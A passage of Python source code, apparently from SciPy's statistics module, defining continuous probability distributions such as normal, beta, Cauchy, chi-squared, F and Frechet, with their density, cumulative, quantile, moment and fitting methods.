return special.ndtr(-x)
def _norm_logsf(x):
return special.log_ndtr(-x)
def _norm_isf(q):
return -special.ndtri(q)
class norm_gen(rv_continuous):
"""A normal continuous random variable.
The location (loc) keyword specifies the mean.
The scale (scale) keyword specifies the standard deviation.
%(before_notes)s
Notes
-----
The probability density function for `norm` is::
norm.pdf(x) = exp(-x**2/2)/sqrt(2*pi)
%(example)s
"""
def _rvs(self):
return self._random_state.standard_normal(self._size)
def _pdf(self, x):
return _norm_pdf(x)
def _logpdf(self, x):
return _norm_logpdf(x)
def _cdf(self, x):
return _norm_cdf(x)
def _logcdf(self, x):
return _norm_logcdf(x)
def _sf(self, x):
return _norm_sf(x)
def _logsf(self, x):
return _norm_logsf(x)
def _ppf(self, q):
return _norm_ppf(q)
def _isf(self, q):
return _norm_isf(q)
def _stats(self):
return 0.0, 1.0, 0.0, 0.0
def _entropy(self):
return 0.5*(log(2*pi)+1)
@inherit_docstring_from(rv_continuous)
def fit(self, data, **kwds):
"""%(super)s
This function (norm_gen.fit) uses explicit formulas for the maximum
likelihood estimation of the parameters, so the `optimizer` argument
is ignored.
"""
floc = kwds.get('floc', None)
fscale = kwds.get('fscale', None)
if floc is not None and fscale is not None:
# This check is for consistency with `rv_continuous.fit`.
# Without this check, this function would just return the
# parameters that were given.
raise ValueError("All parameters fixed. There is nothing to "
"optimize.")
data = np.asarray(data)
if floc is None:
loc = data.mean()
else:
loc = floc
if fscale is None:
scale = np.sqrt(((data - loc)**2).mean())
else:
scale = fscale
return loc, scale
norm = norm_gen(name='norm')
class alpha_gen(rv_continuous):
"""An alpha continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `alpha` is::
alpha.pdf(x, a) = 1/(x**2*Phi(a)*sqrt(2*pi)) * exp(-1/2 * (a-1/x)**2),
where ``Phi(alpha)`` is the normal CDF, ``x > 0``, and ``a > 0``.
%(example)s
"""
def _pdf(self, x, a):
return 1.0/(x**2)/special.ndtr(a)*_norm_pdf(a-1.0/x)
def _logpdf(self, x, a):
return -2*log(x) + _norm_logpdf(a-1.0/x) - log(special.ndtr(a))
def _cdf(self, x, a):
return special.ndtr(a-1.0/x) / special.ndtr(a)
def _ppf(self, q, a):
return 1.0/asarray(a-special.ndtri(q*special.ndtr(a)))
def _stats(self, a):
return [inf]*2 + [nan]*2
alpha = alpha_gen(a=0.0, name='alpha')
class anglit_gen(rv_continuous):
"""An anglit continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `anglit` is::
anglit.pdf(x) = sin(2*x + pi/2) = cos(2*x),
for ``-pi/4 <= x <= pi/4``.
%(example)s
"""
def _pdf(self, x):
return cos(2*x)
def _cdf(self, x):
return sin(x+pi/4)**2.0
def _ppf(self, q):
return (arcsin(sqrt(q))-pi/4)
def _stats(self):
return 0.0, pi*pi/16-0.5, 0.0, -2*(pi**4 - 96)/(pi*pi-8)**2
def _entropy(self):
return 1-log(2)
anglit = anglit_gen(a=-pi/4, b=pi/4, name='anglit')
class arcsine_gen(rv_continuous):
"""An arcsine continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `arcsine` is::
arcsine.pdf(x) = 1/(pi*sqrt(x*(1-x)))
for ``0 < x < 1``.
%(example)s
"""
def _pdf(self, x):
return 1.0/pi/sqrt(x*(1-x))
def _cdf(self, x):
return 2.0/pi*arcsin(sqrt(x))
def _ppf(self, q):
return sin(pi/2.0*q)**2.0
def _stats(self):
mu = 0.5
mu2 = 1.0/8
g1 = 0
g2 = -3.0/2.0
return mu, mu2, g1, g2
def _entropy(self):
return -0.24156447527049044468
arcsine = arcsine_gen(a=0.0, b=1.0, name='arcsine')
class FitDataError(ValueError):
# This exception is raised by, for example, beta_gen.fit when both floc
# and fscale are fixed and there are values in the data not in the open
# interval (floc, floc+fscale).
def __init__(self, distr, lower, upper):
self.args = (
"Invalid values in `data`. Maximum likelihood "
"estimation with {distr!r} requires that {lower!r} < x "
"< {upper!r} for each x in `data`.".format(
distr=distr, lower=lower, upper=upper),
)
class FitSolverError(RuntimeError):
# This exception is raised by, for example, beta_gen.fit when
# optimize.fsolve returns with ier != 1.
def __init__(self, mesg):
emsg = "Solver for the MLE equations failed to converge: "
emsg += mesg.replace('\n', '')
self.args = (emsg,)
def _beta_mle_a(a, b, n, s1):
# The zeros of this function give the MLE for `a`, with
# `b`, `n` and `s1` given. `s1` is the sum of the logs of
# the data. `n` is the number of data points.
psiab = special.psi(a + b)
func = s1 - n * (-psiab + special.psi(a))
return func
def _beta_mle_ab(theta, n, s1, s2):
# Zeros of this function are critical points of
# the maximum likelihood function. Solving this system
# for theta (which contains a and b) gives the MLE for a and b
# given `n`, `s1` and `s2`. `s1` is the sum of the logs of the data,
# and `s2` is the sum of the logs of 1 - data. `n` is the number
# of data points.
a, b = theta
psiab = special.psi(a + b)
func = [s1 - n * (-psiab + special.psi(a)),
s2 - n * (-psiab + special.psi(b))]
return func
class beta_gen(rv_continuous):
"""A beta continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `beta` is::
gamma(a+b) * x**(a-1) * (1-x)**(b-1)
beta.pdf(x, a, b) = ------------------------------------
gamma(a)*gamma(b)
for ``0 < x < 1``, ``a > 0``, ``b > 0``, where ``gamma(z)`` is the gamma
function (`scipy.special.gamma`).
%(example)s
"""
def _rvs(self, a, b):
return self._random_state.beta(a, b, self._size)
def _pdf(self, x, a, b):
return np.exp(self._logpdf(x, a, b))
def _logpdf(self, x, a, b):
lPx = special.xlog1py(b-1.0, -x) + special.xlogy(a-1.0, x)
lPx -= special.betaln(a, b)
return lPx
def _cdf(self, x, a, b):
return special.btdtr(a, b, x)
def _ppf(self, q, a, b):
return special.btdtri(a, b, q)
def _stats(self, a, b):
mn = a*1.0 / (a + b)
var = (a*b*1.0)/(a+b+1.0)/(a+b)**2.0
g1 = 2.0*(b-a)*sqrt((1.0+a+b)/(a*b)) / (2+a+b)
g2 = 6.0*(a**3 + a**2*(1-2*b) + b**2*(1+b) - 2*a*b*(2+b))
g2 /= a*b*(a+b+2)*(a+b+3)
return mn, var, g1, g2
def _fitstart(self, data):
g1 = _skew(data)
g2 = _kurtosis(data)
def func(x):
a, b = x
sk = 2*(b-a)*sqrt(a + b + 1) / (a + b + 2) / sqrt(a*b)
ku = a**3 - a**2*(2*b-1) + b**2*(b+1) - 2*a*b*(b+2)
ku /= a*b*(a+b+2)*(a+b+3)
ku *= 6
return [sk-g1, ku-g2]
a, b = optimize.fsolve(func, (1.0, 1.0))
return super(beta_gen, self)._fitstart(data, args=(a, b))
@inherit_docstring_from(rv_continuous)
def fit(self, data, *args, **kwds):
"""%(super)s
In the special case where both `floc` and `fscale` are given, a
`ValueError` is raised if any value `x` in `data` does not satisfy
`floc < x < floc + fscale`.
"""
# Override rv_continuous.fit, so we can more efficiently handle the
# case where floc and fscale are given.
f0 = kwds.get('f0', None)
f1 = kwds.get('f1', None)
floc = kwds.get('floc', None)
fscale = kwds.get('fscale', None)
if floc is None or fscale is None:
# do general fit
return super(beta_gen, self).fit(data, *args, **kwds)
if f0 is not None and f1 is not None:
# This check is for consistency with `rv_continuous.fit`.
raise ValueError("All parameters fixed. There is nothing to "
"optimize.")
# Special case: loc and scale are constrained, so we are fitting
# just the shape parameters. This can be done much more efficiently
# than the method used in `rv_continuous.fit`. (See the subsection
# "Two unknown parameters" in the section "Maximum likelihood" of
# the Wikipedia article on the Beta distribution for the formulas.)
# Normalize the data to the interval [0, 1].
data = (ravel(data) - floc) / fscale
if np.any(data <= 0) or np.any(data >= 1):
raise FitDataError("beta", lower=floc, upper=floc + fscale)
xbar = data.mean()
if f0 is not None or f1 is not None:
# One of the shape parameters is fixed.
if f0 is not None:
# The shape parameter a is fixed, so swap the parameters
# and flip the data. We always solve for `a`. The result
# will be swapped back before returning.
b = f0
data = 1 - data
xbar = 1 - xbar
else:
b = f1
# Initial guess for a. Use the formula for the mean of the beta
# distribution, E[x] = a / (a + b), to generate a reasonable
# starting point based on the mean of the data and the given
# value of b.
a = b * xbar / (1 - xbar)
# Compute the MLE for `a` by solving _beta_mle_a.
theta, info, ier, mesg = optimize.fsolve(
_beta_mle_a, a,
args=(b, len(data), np.log(data).sum()),
full_output=True
)
if ier != 1:
raise FitSolverError(mesg=mesg)
a = theta[0]
if f0 is not None:
# The shape parameter a was fixed, so swap back the
# parameters.
a, b = b, a
else:
# Neither of the shape parameters is fixed.
# s1 and s2 are used in the extra arguments passed to _beta_mle_ab
# by optimize.fsolve.
s1 = np.log(data).sum()
s2 = np.log(1 - data).sum()
# Use the "method of moments" to estimate the initial
# guess for a and b.
fac = xbar * (1 - xbar) / data.var(ddof=0) - 1
a = xbar * fac
b = (1 - xbar) * fac
# Compute the MLE for a and b by solving _beta_mle_ab.
theta, info, ier, mesg = optimize.fsolve(
_beta_mle_ab, [a, b],
args=(len(data), s1, s2),
full_output=True
)
if ier != 1:
raise FitSolverError(mesg=mesg)
a, b = theta
return a, b, floc, fscale
beta = beta_gen(a=0.0, b=1.0, name='beta')
class betaprime_gen(rv_continuous):
"""A beta prime continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `betaprime` is::
betaprime.pdf(x, a, b) = x**(a-1) * (1+x)**(-a-b) / beta(a, b)
for ``x > 0``, ``a > 0``, ``b > 0``, where ``beta(a, b)`` is the beta
function (see `scipy.special.beta`).
%(example)s
"""
def _rvs(self, a, b):
sz, rndm = self._size, self._random_state
u1 = gamma.rvs(a, size=sz, random_state=rndm)
u2 = gamma.rvs(b, size=sz, random_state=rndm)
return (u1 / u2)
def _pdf(self, x, a, b):
return np.exp(self._logpdf(x, a, b))
def _logpdf(self, x, a, b):
return (special.xlogy(a-1.0, x) - special.xlog1py(a+b, x) -
special.betaln(a, b))
def _cdf_skip(self, x, a, b):
# remove for now: special.hyp2f1 is incorrect for large a
x = where(x == 1.0, 1.0-1e-6, x)
return pow(x, a)*special.hyp2f1(a+b, a, 1+a, -x)/a/special.beta(a, b)
def _munp(self, n, a, b):
if (n == 1.0):
return where(b > 1, a/(b-1.0), inf)
elif (n == 2.0):
return where(b > 2, a*(a+1.0)/((b-2.0)*(b-1.0)), inf)
elif (n == 3.0):
return where(b > 3, a*(a+1.0)*(a+2.0)/((b-3.0)*(b-2.0)*(b-1.0)),
inf)
elif (n == 4.0):
return where(b > 4,
a*(a+1.0)*(a+2.0)*(a+3.0)/((b-4.0)*(b-3.0)
* (b-2.0)*(b-1.0)), inf)
else:
raise NotImplementedError
betaprime = betaprime_gen(a=0.0, name='betaprime')
class bradford_gen(rv_continuous):
"""A Bradford continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `bradford` is::
bradford.pdf(x, c) = c / (k * (1+c*x)),
for ``0 < x < 1``, ``c > 0`` and ``k = log(1+c)``.
%(example)s
"""
def _pdf(self, x, c):
return c / (c*x + 1.0) / log(1.0+c)
def _cdf(self, x, c):
return log(1.0+c*x) / log(c+1.0)
def _ppf(self, q, c):
return ((1.0+c)**q-1)/c
def _stats(self, c, moments='mv'):
k = log(1.0+c)
mu = (c-k)/(c*k)
mu2 = ((c+2.0)*k-2.0*c)/(2*c*k*k)
g1 = None
g2 = None
if 's' in moments:
g1 = sqrt(2)*(12*c*c-9*c*k*(c+2)+2*k*k*(c*(c+3)+3))
g1 /= sqrt(c*(c*(k-2)+2*k))*(3*c*(k-2)+6*k)
if 'k' in moments:
g2 = (c**3*(k-3)*(k*(3*k-16)+24)+12*k*c*c*(k-4)*(k-3)
+ 6*c*k*k*(3*k-14) + 12*k**3)
g2 /= 3*c*(c*(k-2)+2*k)**2
return mu, mu2, g1, g2
def _entropy(self, c):
k = log(1+c)
return k/2.0 - log(c/k)
bradford = bradford_gen(a=0.0, b=1.0, name='bradford')
class burr_gen(rv_continuous):
"""A Burr continuous random variable.
%(before_notes)s
See Also
--------
fisk : a special case of `burr` with ``d = 1``
Notes
-----
The probability density function for `burr` is::
burr.pdf(x, c, d) = c * d * x**(-c-1) * (1+x**(-c))**(-d-1)
for ``x > 0``.
%(example)s
"""
def _pdf(self, x, c, d):
return c*d*(x**(-c-1.0))*((1+x**(-c*1.0))**(-d-1.0))
def _cdf(self, x, c, d):
return (1+x**(-c*1.0))**(-d**1.0)
def _ppf(self, q, c, d):
return (q**(-1.0/d)-1)**(-1.0/c)
def _munp(self, n, c, d):
nc = 1. * n / c
return d * special.beta(1.0 - nc, d + nc)
burr = burr_gen(a=0.0, name='burr')
class fisk_gen(burr_gen):
"""A Fisk continuous random variable.
The Fisk distribution is also known as the log-logistic distribution, and
equals the Burr distribution with ``d == 1``.
%(before_notes)s
See Also
--------
burr
%(example)s
"""
def _pdf(self, x, c):
return burr_gen._pdf(self, x, c, 1.0)
def _cdf(self, x, c):
return burr_gen._cdf(self, x, c, 1.0)
def _ppf(self, x, c):
return burr_gen._ppf(self, x, c, 1.0)
def _munp(self, n, c):
return burr_gen._munp(self, n, c, 1.0)
def _entropy(self, c):
return 2 - log(c)
fisk = fisk_gen(a=0.0, name='fisk')
# median = loc
class cauchy_gen(rv_continuous):
"""A Cauchy continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `cauchy` is::
cauchy.pdf(x) = 1 / (pi * (1 + x**2))
%(example)s
"""
def _pdf(self, x):
return 1.0/pi/(1.0+x*x)
def _cdf(self, x):
return 0.5 + 1.0/pi*arctan(x)
def _ppf(self, q):
return tan(pi*q-pi/2.0)
def _sf(self, x):
return 0.5 - 1.0/pi*arctan(x)
def _isf(self, q):
return tan(pi/2.0-pi*q)
def _stats(self):
return inf, inf, nan, nan
def _entropy(self):
return log(4*pi)
def _fitstart(self, data, args=None):
return (0, 1)
cauchy = cauchy_gen(name='cauchy')
class chi_gen(rv_continuous):
"""A chi continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `chi` is::
chi.pdf(x, df) = x**(df-1) * exp(-x**2/2) / (2**(df/2-1) * gamma(df/2))
for ``x > 0``.
Special cases of `chi` are:
- ``chi(1, loc, scale)`` is equivalent to `halfnorm`
- ``chi(2, 0, scale)`` is equivalent to `rayleigh`
- ``chi(3, 0, scale)`` is equivalent to `maxwell`
%(example)s
"""
def _rvs(self, df):
sz, rndm = self._size, self._random_state
return sqrt(chi2.rvs(df, size=sz, random_state=rndm))
def _pdf(self, x, df):
return x**(df-1.)*exp(-x*x*0.5)/(2.0)**(df*0.5-1)/gam(df*0.5)
def _cdf(self, x, df):
return special.gammainc(df*0.5, 0.5*x*x)
def _ppf(self, q, df):
return sqrt(2*special.gammaincinv(df*0.5, q))
def _stats(self, df):
mu = sqrt(2)*special.gamma(df/2.0+0.5)/special.gamma(df/2.0)
mu2 = df - mu*mu
g1 = (2*mu**3.0 + mu*(1-2*df))/asarray(np.power(mu2, 1.5))
g2 = 2*df*(1.0-df)-6*mu**4 + 4*mu**2 * (2*df-1)
g2 /= asarray(mu2**2.0)
return mu, mu2, g1, g2
chi = chi_gen(a=0.0, name='chi')
## Chi-squared (gamma-distributed with loc=0 and scale=2 and shape=df/2)
class chi2_gen(rv_continuous):
"""A chi-squared continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `chi2` is::
chi2.pdf(x, df) = 1 / (2*gamma(df/2)) * (x/2)**(df/2-1) * exp(-x/2)
%(example)s
"""
def _rvs(self, df):
return self._random_state.chisquare(df, self._size)
def _pdf(self, x, df):
return exp(self._logpdf(x, df))
def _logpdf(self, x, df):
return special.xlogy(df/2.-1, x) - x/2. - gamln(df/2.) - (log(2)*df)/2.
def _cdf(self, x, df):
return special.chdtr(df, x)
def _sf(self, x, df):
return special.chdtrc(df, x)
def _isf(self, p, df):
return special.chdtri(df, p)
def _ppf(self, p, df):
return self._isf(1.0-p, df)
def _stats(self, df):
mu = df
mu2 = 2*df
g1 = 2*sqrt(2.0/df)
g2 = 12.0/df
return mu, mu2, g1, g2
chi2 = chi2_gen(a=0.0, name='chi2')
class cosine_gen(rv_continuous):
"""A cosine continuous random variable.
%(before_notes)s
Notes
-----
The cosine distribution is an approximation to the normal distribution.
The probability density function for `cosine` is::
cosine.pdf(x) = 1/(2*pi) * (1+cos(x))
for ``-pi <= x <= pi``.
%(example)s
"""
def _pdf(self, x):
return 1.0/2/pi*(1+cos(x))
def _cdf(self, x):
return 1.0/2/pi*(pi + x + sin(x))
def _stats(self):
return 0.0, pi*pi/3.0-2.0, 0.0, -6.0*(pi**4-90)/(5.0*(pi*pi-6)**2)
def _entropy(self):
return log(4*pi)-1.0
cosine = cosine_gen(a=-pi, b=pi, name='cosine')
class dgamma_gen(rv_continuous):
"""A double gamma continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `dgamma` is::
dgamma.pdf(x, a) = 1 / (2*gamma(a)) * abs(x)**(a-1) * exp(-abs(x))
for ``a > 0``.
%(example)s
"""
def _rvs(self, a):
sz, rndm = self._size, self._random_state
u = rndm.random_sample(size=sz)
gm = gamma.rvs(a, size=sz, random_state=rndm)
return gm * where(u >= 0.5, 1, -1)
def _pdf(self, x, a):
ax = abs(x)
return 1.0/(2*special.gamma(a))*ax**(a-1.0) * exp(-ax)
def _logpdf(self, x, a):
ax = abs(x)
return special.xlogy(a-1.0, ax) - ax - log(2) - gamln(a)
def _cdf(self, x, a):
fac = 0.5*special.gammainc(a, abs(x))
return where(x > 0, 0.5 + fac, 0.5 - fac)
def _sf(self, x, a):
fac = 0.5*special.gammainc(a, abs(x))
return where(x > 0, 0.5-fac, 0.5+fac)
def _ppf(self, q, a):
fac = special.gammainccinv(a, 1-abs(2*q-1))
return where(q > 0.5, fac, -fac)
def _stats(self, a):
mu2 = a*(a+1.0)
return 0.0, mu2, 0.0, (a+2.0)*(a+3.0)/mu2-3.0
dgamma = dgamma_gen(name='dgamma')
class dweibull_gen(rv_continuous):
"""A double Weibull continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `dweibull` is::
dweibull.pdf(x, c) = c / 2 * abs(x)**(c-1) * exp(-abs(x)**c)
%(example)s
"""
def _rvs(self, c):
sz, rndm = self._size, self._random_state
u = rndm.random_sample(size=sz)
w = weibull_min.rvs(c, size=sz, random_state=rndm)
return w * (where(u >= 0.5, 1, -1))
def _pdf(self, x, c):
ax = abs(x)
Px = c / 2.0 * ax**(c-1.0) * exp(-ax**c)
return Px
def _logpdf(self, x, c):
ax = abs(x)
return log(c) - log(2.0) + special.xlogy(c - 1.0, ax) - ax**c
def _cdf(self, x, c):
Cx1 = 0.5 * exp(-abs(x)**c)
return where(x > 0, 1 - Cx1, Cx1)
def _ppf(self, q, c):
fac = 2. * where(q <= 0.5, q, 1. - q)
fac = np.power(-log(fac), 1.0 / c)
return where(q > 0.5, fac, -fac)
def _munp(self, n, c):
return (1 - (n % 2)) * special.gamma(1.0 + 1.0 * n / c)
# since we know that all odd moments are zeros, return them at once.
# returning Nones from _stats makes the public stats call _munp
# so overall we're saving one or two gamma function evaluations here.
def _stats(self, c):
return 0, None, 0, None
dweibull = dweibull_gen(name='dweibull')
## Exponential (gamma distributed with a=1.0, loc=loc and scale=scale)
class expon_gen(rv_continuous):
"""An exponential continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `expon` is::
expon.pdf(x) = lambda * exp(- lambda*x)
for ``x >= 0``.
The scale parameter is equal to ``scale = 1.0 / lambda``.
`expon` does not have shape parameters.
%(example)s
"""
def _rvs(self):
return self._random_state.standard_exponential(self._size)
def _pdf(self, x):
return exp(-x)
def _logpdf(self, x):
return -x
def _cdf(self, x):
return -special.expm1(-x)
def _ppf(self, q):
return -special.log1p(-q)
def _sf(self, x):
return exp(-x)
def _logsf(self, x):
return -x
def _isf(self, q):
return -log(q)
def _stats(self):
return 1.0, 1.0, 2.0, 6.0
def _entropy(self):
return 1.0
expon = expon_gen(a=0.0, name='expon')
class exponweib_gen(rv_continuous):
"""An exponentiated Weibull continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `exponweib` is::
exponweib.pdf(x, a, c) =
a * c * (1-exp(-x**c))**(a-1) * exp(-x**c)*x**(c-1)
for ``x > 0``, ``a > 0``, ``c > 0``.
%(example)s
"""
def _pdf(self, x, a, c):
return exp(self._logpdf(x, a, c))
def _logpdf(self, x, a, c):
negxc = -x**c
exm1c = -special.expm1(negxc)
logp = (log(a) + log(c) + special.xlogy(a - 1.0, exm1c) +
negxc + special.xlogy(c - 1.0, x))
return logp
def _cdf(self, x, a, c):
exm1c = -special.expm1(-x**c)
return exm1c**a
def _ppf(self, q, a, c):
return (-special.log1p(-q**(1.0/a)))**asarray(1.0/c)
exponweib = exponweib_gen(a=0.0, name='exponweib')
class exponpow_gen(rv_continuous):
"""An exponential power continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `exponpow` is::
exponpow.pdf(x, b) = b * x**(b-1) * exp(1 + x**b - exp(x**b))
for ``x >= 0``, ``b > 0``. Note that this is a different distribution
from the exponential power distribution that is also known under the names
"generalized normal" or "generalized Gaussian".
References
----------
http://www.math.wm.edu/~leemis/chart/UDR/PDFs/Exponentialpower.pdf
%(example)s
"""
def _pdf(self, x, b):
return exp(self._logpdf(x, b))
def _logpdf(self, x, b):
xb = x**b
f = 1 + log(b) + special.xlogy(b - 1.0, x) + xb - exp(xb)
return f
def _cdf(self, x, b):
return -special.expm1(-special.expm1(x**b))
def _sf(self, x, b):
return exp(-special.expm1(x**b))
def _isf(self, x, b):
return (special.log1p(-log(x)))**(1./b)
def _ppf(self, q, b):
return pow(special.log1p(-special.log1p(-q)), 1.0/b)
exponpow = exponpow_gen(a=0.0, name='exponpow')
class fatiguelife_gen(rv_continuous):
"""A fatigue-life (Birnbaum-Saunders) continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `fatiguelife` is::
fatiguelife.pdf(x, c) =
(x+1) / (2*c*sqrt(2*pi*x**3)) * exp(-(x-1)**2/(2*x*c**2))
for ``x > 0``.
References
----------
.. [1] "Birnbaum-Saunders distribution",
http://en.wikipedia.org/wiki/Birnbaum-Saunders_distribution
%(example)s
"""
def _rvs(self, c):
z = self._random_state.standard_normal(self._size)
x = 0.5*c*z
x2 = x*x
t = 1.0 + 2*x2 + 2*x*sqrt(1 + x2)
return t
def _pdf(self, x, c):
return np.exp(self._logpdf(x, c))
def _logpdf(self, x, c):
return (log(x+1) - (x-1)**2 / (2.0*x*c**2) - log(2*c) -
0.5*(log(2*pi) + 3*log(x)))
def _cdf(self, x, c):
return special.ndtr(1.0 / c * (sqrt(x) - 1.0/sqrt(x)))
def _ppf(self, q, c):
tmp = c*special.ndtri(q)
return 0.25 * (tmp + sqrt(tmp**2 + 4))**2
def _stats(self, c):
# NB: the formula for kurtosis in wikipedia seems to have an error:
# it's 40, not 41. At least it disagrees with the one from Wolfram
# Alpha. And the latter one, below, passes the tests, while the wiki
# one doesn't So far I didn't have the guts to actually check the
# coefficients from the expressions for the raw moments.
c2 = c*c
mu = c2 / 2.0 + 1.0
den = 5.0 * c2 + 4.0
mu2 = c2*den / 4.0
g1 = 4 * c * (11*c2 + 6.0) / np.power(den, 1.5)
g2 = 6 * c2 * (93*c2 + 40.0) / den**2.0
return mu, mu2, g1, g2
fatiguelife = fatiguelife_gen(a=0.0, name='fatiguelife')
class foldcauchy_gen(rv_continuous):
"""A folded Cauchy continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `foldcauchy` is::
foldcauchy.pdf(x, c) = 1/(pi*(1+(x-c)**2)) + 1/(pi*(1+(x+c)**2))
for ``x >= 0``.
%(example)s
"""
def _rvs(self, c):
return abs(cauchy.rvs(loc=c, size=self._size,
random_state=self._random_state))
def _pdf(self, x, c):
return 1.0/pi*(1.0/(1+(x-c)**2) + 1.0/(1+(x+c)**2))
def _cdf(self, x, c):
return 1.0/pi*(arctan(x-c) + arctan(x+c))
def _stats(self, c):
return inf, inf, nan, nan
foldcauchy = foldcauchy_gen(a=0.0, name='foldcauchy')
class f_gen(rv_continuous):
"""An F continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `f` is::
df2**(df2/2) * df1**(df1/2) * x**(df1/2-1)
F.pdf(x, df1, df2) = --------------------------------------------
(df2+df1*x)**((df1+df2)/2) * B(df1/2, df2/2)
for ``x > 0``.
%(example)s
"""
def _rvs(self, dfn, dfd):
return self._random_state.f(dfn, dfd, self._size)
def _pdf(self, x, dfn, dfd):
return exp(self._logpdf(x, dfn, dfd))
def _logpdf(self, x, dfn, dfd):
n = 1.0 * dfn
m = 1.0 * dfd
lPx = m/2 * log(m) + n/2 * log(n) + (n/2 - 1) * log(x)
lPx -= ((n+m)/2) * log(m + n*x) + special.betaln(n/2, m/2)
return lPx
def _cdf(self, x, dfn, dfd):
return special.fdtr(dfn, dfd, x)
def _sf(self, x, dfn, dfd):
return special.fdtrc(dfn, dfd, x)
def _ppf(self, q, dfn, dfd):
return special.fdtri(dfn, dfd, q)
def _stats(self, dfn, dfd):
v1, v2 = 1. * dfn, 1. * dfd
v2_2, v2_4, v2_6, v2_8 = v2 - 2., v2 - 4., v2 - 6., v2 - 8.
mu = _lazywhere(
v2 > 2, (v2, v2_2),
lambda v2, v2_2: v2 / v2_2,
np.inf)
mu2 = _lazywhere(
v2 > 4, (v1, v2, v2_2, v2_4),
lambda v1, v2, v2_2, v2_4:
2 * v2 * v2 * (v1 + v2_2) / (v1 * v2_2**2 * v2_4),
np.inf)
g1 = _lazywhere(
v2 > 6, (v1, v2_2, v2_4, v2_6),
lambda v1, v2_2, v2_4, v2_6:
(2 * v1 + v2_2) / v2_6 * sqrt(v2_4 / (v1 * (v1 + v2_2))),
np.nan)
g1 *= np.sqrt(8.)
g2 = _lazywhere(
v2 > 8, (g1, v2_6, v2_8),
lambda g1, v2_6, v2_8: (8 + g1 * g1 * v2_6) / v2_8,
np.nan)
g2 *= 3. / 2.
return mu, mu2, g1, g2
f = f_gen(a=0.0, name='f')
## Folded Normal
## abs(Z) where (Z is normal with mu=L and std=S so that c=abs(L)/S)
##
## note: regress docs have scale parameter correct, but first parameter
## he gives is a shape parameter A = c * scale
## Half-normal is folded normal with shape-parameter c=0.
class foldnorm_gen(rv_continuous):
"""A folded normal continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `foldnorm` is::
foldnormal.pdf(x, c) = sqrt(2/pi) * cosh(c*x) * exp(-(x**2+c**2)/2)
for ``c >= 0``.
%(example)s
"""
def _argcheck(self, c):
return (c >= 0)
def _rvs(self, c):
return abs(self._random_state.standard_normal(self._size) + c)
def _pdf(self, x, c):
return _norm_pdf(x + c) + _norm_pdf(x-c)
def _cdf(self, x, c):
return special.ndtr(x-c) + special.ndtr(x+c) - 1.0
def _stats(self, c):
# Regina C. Elandt, Technometrics 3, 551 (1961)
# http://www.jstor.org/stable/1266561
#
c2 = c*c
expfac = np.exp(-0.5*c2) / np.sqrt(2.*pi)
mu = 2.*expfac + c * special.erf(c/sqrt(2))
mu2 = c2 + 1 - mu*mu
g1 = 2. * (mu*mu*mu - c2*mu - expfac)
g1 /= np.power(mu2, 1.5)
g2 = c2 * (c2 + 6.) + 3 + 8.*expfac*mu
g2 += (2. * (c2 - 3.) - 3. * mu**2) * mu**2
g2 = g2 / mu2**2.0 - 3.
return mu, mu2, g1, g2
foldnorm = foldnorm_gen(a=0.0, name='foldnorm')
## Extreme Value Type II or Frechet
## (defined in Regress+ documentation as Extreme LB) as
## a limiting value distribution.
##
class frechet_r_gen(rv_continuous):
"""A Frechet right (or Weibull minimum) continuous random variable.
%(before_notes)s
See Also
--------
weibull_min : The same distribution as `frechet_r`.
frechet_l, weibull_max
Notes
-----
The probability density function for `frechet_r` is::
frechet_r.pdf(x, c) = c * x**(c-1) * exp(-x**c)
for ``x > 0``, ``c > 0``.
%(example)s
"""
def _pdf(self, x, c):
return c*pow(x, c-1)*exp(-pow(x, c))
def _logpdf(self, x, c):
return log(c) + (c-1)*log(x) - pow(x, c)
def _cdf(self, x, c):
return -special.expm1(-pow(x, c))
def _ppf(self, q, c):
return pow(-special.log1p(-q), 1.0/c)
def _munp(self, n, c):
return special.gamma(1.0+n*1.0/c)
def _entropy(self, c):
return -_EULER / c - log(c) + _EULER + 1
frechet_r = frechet_r_gen(a=0.0, name='frechet_r')
weibull_min = frechet_r_gen(a=0.0, name='weibull_min')
class frechet_l_gen(rv_continuous):
"""A Frechet left (or Weibull maximum) continuous random variable.
%(before_notes)s
See Also
--------
weibull_max : The same distribution as `frechet_l`.
frechet_r, weibull_min
Notes
-----
The probability density function for `frechet_l` is::
frechet_l.pdf(x, c) = c * (-x)**(c-1) * exp(-(-x)**c)
for ``x < 0``, ``c > 0``.
%(example)s
"""
def _pdf(self, x, c):
return c*pow(-x, c-1)*exp(-pow(-x, c))
def _cdf(self, x, c):
return exp(-pow(-x, c))
def _ppf(self, q, c):
return -pow(-log(q), 1.0/c)
def _munp(self, n, c):
val = special.gamma(1.0+n*1.0/c)
if (int(n) % 2):
sgn = -1
else:
sgn = 1
return sgn * val
def _entropy(self, c):
return -_EULER / c - log(c) + _EULER + 1
frechet_l = frechet_l_gen(b=0.0, name='frechet_l')
weibull_max = frechet_l_gen(b=0.0, name='weibull_max')
class genlogistic_gen(rv_continuous):
"""A generalized logistic continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `genlogistic` is::
genlogistic.pdf(x, c) = c * exp(-x) / (1 + exp(-x))**(c+1)
for ``x > 0``, ``c > 0``.
%(example)s
"""
def _pdf(self, x, c):
return exp(self._logpdf(x, c))
def _logpdf(self, x, c):
return log(c) - x - (c+1.0)*special.log1p(exp(-x))
def _cdf(self, x, c):
Cx = (1+exp(-x))**(-c)
return Cx
def _ppf(self, q, c):
vals = -log(pow(q, -1.0/c)-1)
return vals
def _stats(self, c):
zeta = special.zeta
mu = _EULER + special.psi(c)
mu2 = pi*pi/6.0 + zeta(2, c)
g1 = -2*zeta(3, c) + 2*_ZETA3
